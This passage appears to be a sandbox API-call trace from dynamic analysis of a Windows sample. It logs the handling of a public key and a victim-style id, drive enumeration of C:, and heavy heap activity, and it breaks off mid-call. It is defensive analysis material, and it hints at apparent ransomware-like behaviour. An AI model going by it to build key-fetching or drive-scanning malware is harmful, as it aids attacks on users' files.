cchWideChar=545 | out: lpWideCharStr="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW\"}") returned 545 [0163.838] lstrcpyW (in: lpString1=0x51a7c0, lpString2="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW\"}" | out: lpString1="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW\"}") returned="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW\"}" [0163.838] lstrlenW (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0163.838] lstrlenA (lpString="\",\"id\":\"") returned 8 [0163.838] lstrcpyA (in: lpString1=0x9f5ab78, lpString2="0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW\"}" | out: lpString1="0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW\"}") returned="0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW\"}" [0163.838] lstrcpyA (in: lpString1=0x9f5a778, lpString2="0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW\"}" | out: lpString1="0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW\"}") returned="0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW\"}" [0163.838] lstrlenA (lpString="0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW\"}") returned 42 [0163.838] lstrlenA (lpString="0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW\"}") returned 42 [0163.838] lstrlenA (lpString="0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW\"}") returned 42 [0163.838] lstrlenA (lpString="0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW\"}") returned 42 [0163.838] lstrlenA (lpString="0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW\"}") returned 42 [0163.838] lstrlenA (lpString="0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW\"}") returned 42 [0163.838] lstrlenA (lpString="0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW\"}") returned 42 [0163.838] lstrlenA (lpString="0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW\"}") returned 42 [0163.838] lstrlenA (lpString="0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW\"}") returned 42 [0163.838] lstrlenA (lpString="0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW\"}") returned 42 [0163.839] lstrlenA (lpString="0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW\"}") returned 42 [0163.839] lstrlenA (lpString="0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW\"}") returned 42 [0163.839] lstrlenA (lpString="0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW\"}") returned 42 [0163.839] lstrlenA (lpString="0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW\"}") returned 42 [0163.839] lstrlenA (lpString="0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW\"}") returned 42 [0163.839] lstrlenA (lpString="0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW\"}") returned 42 [0163.839] lstrlenA (lpString="0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW\"}") returned 42 [0163.839] lstrlenA (lpString="0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW\"}") returned 42 [0163.839] lstrlenA (lpString="0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW\"}") returned 42 [0163.839] lstrlenA (lpString="0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW\"}") returned 42 [0163.839] lstrlenA (lpString="0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW\"}") returned 42 [0163.839] lstrlenA (lpString="0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW\"}") returned 42 [0163.839] lstrlenA (lpString="0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW\"}") returned 42 [0163.839] lstrlenA (lpString="0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW\"}") returned 42 [0163.839] lstrlenA (lpString="0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW\"}") returned 42 [0163.839] lstrlenA (lpString="0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW\"}") returned 42 [0163.839] lstrlenA (lpString="0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW\"}") returned 42 [0163.839] lstrlenA (lpString="0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW\"}") returned 42 [0163.839] lstrlenA (lpString="0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW\"}") returned 42 [0163.839] lstrlenA (lpString="0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW\"}") returned 42 [0163.839] lstrlenA (lpString="0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW\"}") returned 42 [0163.839] lstrlenA (lpString="0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW\"}") returned 42 [0163.839] lstrlenA (lpString="0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW\"}") returned 42 [0163.839] lstrlenA (lpString="0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW\"}") returned 42 [0163.839] lstrlenA (lpString="0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW\"}") returned 42 [0163.839] lstrlenA (lpString="0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW\"}") returned 42 [0163.839] lstrlenA (lpString="0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW\"}") returned 42 [0163.839] lstrlenA (lpString="0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW\"}") returned 42 [0163.839] lstrlenA (lpString="0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW\"}") returned 42 [0163.839] lstrlenA (lpString="0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW\"}") returned 42 [0163.839] lstrlenA (lpString="0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW\"}") returned 42 [0163.839] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0xd36ab8 [0163.839] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x854) returned 0x369eea0 [0163.839] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xd36ab8, cbMultiByte=-1, lpWideCharStr=0x369eea0, cchWideChar=1066 | out: lpWideCharStr="0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW\"}") returned 43 [0163.839] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x369f700 [0163.840] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x369eea0 | out: hHeap=0xcd0000) returned 1 [0163.840] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd36ab8 | out: hHeap=0xcd0000) returned 1 [0163.840] lstrcpyW (in: lpString1=0x521cf0, lpString2="0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW\"}" | out: lpString1="0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW\"}") returned="0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW\"}" [0163.840] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x369f700 | out: hHeap=0xcd0000) returned 1 [0163.840] lstrlenA (lpString="0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW\"}") returned 42 [0163.840] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x56) returned 0x36131f0 [0163.840] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x9f5a778, cbMultiByte=-1, lpWideCharStr=0x36131f0, cchWideChar=43 | out: lpWideCharStr="0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW\"}") returned 43 [0163.840] lstrcpyW (in: lpString1=0x521cf0, lpString2="0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW\"}" | out: lpString1="0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW\"}") returned="0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW\"}" [0163.840] lstrlenW (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0163.840] lstrlenW (lpString="0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW") returned 40 [0163.840] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x369e688 | out: hHeap=0xcd0000) returned 1 Thread: id = 116 os_tid = 0x324 [0164.176] timeGetTime () returned 0x1158881 [0164.176] GetLastError () returned 0x54f [0164.176] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x8, Size=0x3bc) returned 0x369e688 [0164.176] GetCurrentThreadId () returned 0x324 [0164.176] SetLastError (dwErrCode=0x54f) [0164.176] Sleep (dwMilliseconds=0x0) [0164.186] Sleep (dwMilliseconds=0x3e8) [0165.472] GetLogicalDrives () returned 0x4 [0165.473] SetErrorMode (uMode=0x1) returned 0x0 [0165.473] PathFileExistsA (pszPath="C:\\") returned 1 [0165.473] SetErrorMode (uMode=0x0) returned 0x1 [0165.473] GetDriveTypeA (lpRootPathName="C:\\") returned 0x3 [0165.473] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x806) returned 0x3b40090 [0165.473] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x401fe60, cbMultiByte=-1, lpWideCharStr=0x3b40090, cchWideChar=1027 | out: lpWideCharStr="C:\\") returned 4 [0165.473] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x810) returned 0x3b19640 [0165.473] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.473] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x18) returned 0x35e0570 [0165.473] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.473] PeekMessageW (in: lpMsg=0x401fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x401fb74) returned 0 [0165.474] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.474] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.474] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.474] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.474] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.474] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.474] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.474] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.474] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.474] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.474] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0165.474] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.474] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.474] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc2e) returned 0x3b40090 [0165.474] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.474] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.474] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.474] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.474] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0165.474] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.474] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b40090 [0165.474] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.474] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b40090 [0165.474] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.474] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.474] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.474] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.474] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.474] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0165.474] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.474] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0165.474] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.474] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.474] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.474] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.474] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.474] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.474] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.475] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.475] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.475] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.475] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.475] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.475] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.475] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.475] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.475] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.475] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc46) returned 0x3b40090 [0165.475] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.475] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.475] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.475] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.475] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.475] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc2e) returned 0x3b40090 [0165.475] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.475] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.475] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b40090 [0165.475] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.475] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b40090 [0165.475] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.475] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.475] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.475] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.475] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.475] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.475] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc46) returned 0x3b40090 [0165.475] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.475] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.475] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0165.475] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.475] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0165.475] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.475] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.475] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.475] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.475] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.476] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.476] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.476] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.476] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.476] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.476] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.476] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.476] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.476] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.476] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.476] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.476] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc46) returned 0x3b40090 [0165.476] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.476] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.476] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.476] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.476] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b40090 [0165.476] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.476] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b40090 [0165.476] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.476] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.476] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.476] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.476] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.476] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.476] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc46) returned 0x3b40090 [0165.476] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.476] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.476] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0165.476] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.476] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0165.476] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.476] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.476] HeapFree (in: hHeap=0xcd0000, 